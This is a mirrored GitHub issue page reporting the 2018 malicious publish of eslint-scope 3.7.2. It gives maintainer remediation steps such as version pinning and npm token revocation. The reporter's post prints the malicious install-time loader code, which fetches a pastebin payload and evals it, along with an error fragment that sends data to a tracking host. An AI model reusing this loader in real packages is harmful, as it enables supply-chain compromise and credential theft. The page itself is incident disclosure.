Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Virus in eslint-scope?
See original GitHub issueUpdated blog post: https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes
Update from the maintainers
Incident status report from npm
Please follow the comment by @platinumazure that gives a little insight into what happened: https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026
It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See https://github.com/eslint/eslint/issues/10600 for more information.
In the meantime
- Pin the version of
eslint-scopeto3.7.1, one way is to add theresolutionsto yourpackage.json
"resolutions": {
"eslint-scope": "3.7.1"
}
Verify the dependency version with yarn list eslint-scope. It should print out eslint-scope@3.7.1
-
Use
package-lock.jsonoryarn.lockand have it in your repo if possible. Do not upgrade to 3.7.2 even ifyarn outdatedshows that there is a new version available. -
Revoke your NPM token as suggested in the comment below https://github.com/eslint/eslint-scope/issues/39#issuecomment-404496856. You can do the same by logging in to https://www.npmjs.com/, selecting the “tokens” menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.
The issue
I don’t know what the hell this is but it looks like a virus to me:
[2/3] ⠠ eslint-scope
error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
Exit code: 1
Command: node ./lib/build.js
Arguments:
Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope
Output:
undefined:30
https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+conten
^^^^^^
SyntaxError: Unexpected end of input
at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
at emitOne (events.js:116:13)
at IncomingMessage.emit (events.js:211:7)
at IncomingMessage.Readable.read (_stream_readable.js:475:10)
at flow (_stream_readable.js:846:34)
at resume_ (_stream_readable.js:828:3)
at _combinedTickCallback (internal/process/next_tick.js:138:11)
The contents of a suspicious file:
try{
var https=require('https');
https.get({'hostname':'pastebin.com',path:'/raw/XLeVP82h',headers:{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',Accept:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}},(r)=>{
r.setEncoding('utf8');
r.on('data',(c)=>{
eval(c);
});
r.on('error',()=>{});
}).on('error',()=>{});
}catch(e){}
The URL it attempts to load is http://pastebin.com/raw/XLeVP82h
Also it attempts to send my .npmrc somewhere.
This is version 3.7.2 that’s been published an hour ago.
Issue Analytics
- State:
- Created 5 years ago
- Reactions:380
- Comments:92 (19 by maintainers)
Top Results From Across the Web
Top Related Medium Post
Top Related StackOverflow Question
Troubleshoot Live Code
Top Related Reddit Thread
Top Related Hackernoon Post
Top Related Tweet
Top Related Dev.to Post
Top Related Hashnode Post
Once things settle a bit, I’d love to see the eslint team and/or npm support publish a post-mortem discussing exactly what happened and recommendations to prevent this from occurring for other npm package authors in the future.
@DylanLukes You should not be using joke software like npm then.